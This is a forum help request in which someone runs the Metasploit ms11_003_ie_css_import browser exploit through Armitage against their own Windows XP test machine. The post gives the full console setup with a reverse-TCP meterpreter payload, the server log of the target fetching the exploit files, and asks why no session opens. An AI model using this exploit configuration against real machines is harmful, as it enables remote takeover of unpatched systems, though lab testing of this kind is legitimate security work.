Hey, guys. I really hope somebody could help me out here.
I am running Linux, Ubuntu 10.04
I have mysql installed and database msf3 configured.
I have the Metasploit framework installed
I have armitage installed.
I run the msfrpc daemon: (with no SSL and type Basic)
sudo msfrpcd -f -U msf -P test -a 127.0.0.1 -t Basic -S
I get the following output:
[*] XMLRPC starting on 127.0.0.1:55553 (NO SSL):Basic...
[*] XMLRPC ready at 2011-09-02 13:20:16 -0500.
I assume everything is good here then I run gksudo armitage
Uncheck SSL and select mysql
I hit Connect, Armitage loads, I do an nmap on my IP range. See the target computer I have that I'm testing
My target PC is a Dell, Pentium 4 Processor, running Windows XP Pro SP3 with IE6
Then I select exploit:
ms11_003_ie_css_import
I edit the following settings to the following values:
SRVPORT:80
URIPATH: /
*LPORT: 443
I put an asterisk by the last setting because I ran the exploit with the default port (I believe 4444), and then with 443, and then again with 23
Every time I changed the port number I terminated and restarted msfrpcd and armitage
With each time I get the same results: (after the target logs onto the IP address in IE6)
msf > use exploit/windows/browser/ms11_003_ie_css_import
msf > set SSLVersion SSL3
SSLVersion => SSL3
msf exploit(ms11_003_ie_css_import) > set LHOST 10.12.5.48
LHOST => 10.12.5.48
msf exploit(ms11_003_ie_css_import) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(ms11_003_ie_css_import) > set LPORT 443
LPORT => 443
msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms11_003_ie_css_import) > set SSL 0
SSL => 0
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set TARGET 0
TARGET => 0
msf exploit(ms11_003_ie_css_import) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > set OBFUSCATE 1
OBFUSCATE => 1
msf exploit(ms11_003_ie_css_import) > exploit -j
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.12.5.48:80/
[*] Server started.
[*] 10.12.5.114:2156 Received request for "/"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import redirect
[*] 10.12.5.114:2156 Received request for "/C3QEIDn.html"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import HTML
[*] 10.12.5.114:2156 Received request for "/generic-1314988683.dll"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import .NET DLL
[*] 10.12.5.114:2156 Received request for "/iexplore.exe.config"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS
[*] 10.12.5.114:2156 Received request for "/\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80\xEC\x83\x80"
[*] 10.12.5.114:2156 Sending windows/browser/ms11_003_ie_css_import CSS
Everything runs except for the meterpreter session. I don't compromise my target, and I don't get red lightning bolts surrounding the image of the target IP.
It seems like I'm doing everything that should be done. What am I doing wrong?
I changed the port numbers because I believe it may be that the network is blocking certain ports. But 443 and 23 should work